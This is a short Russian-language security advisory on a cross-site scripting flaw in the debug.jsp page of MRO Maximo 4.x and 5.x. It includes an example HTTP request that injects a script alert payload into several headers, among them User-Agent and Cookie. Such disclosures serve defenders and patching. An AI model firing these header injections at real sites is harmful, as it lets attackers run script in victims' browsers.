Программа:
MRO Maximo 4.x
MRO Maximo 5.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных, передаваемых через различные HTTP заголовки (например, "Accept", "Accept-Language",
"UA-CPU", "Accept-Encoding", "User-Agent", "Cookie") сценарием jsp/common/system/debug.jsp.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.
Пример:
GET /jsp/common/system/debug.jsp HTTP/1.1
Accept: <script>alert('XSS');</script>
Accept-Language: <script>alert('XSS');</script>
UA-CPU: <script>alert('XSS');</script>
Accept-Encoding: <script>alert('XSS');</script>
User-Agent: <script>alert('XSS');</script>
Host: maximo
Connection: Keep-Alive
Cookie: <script>alert('XSS');</script>
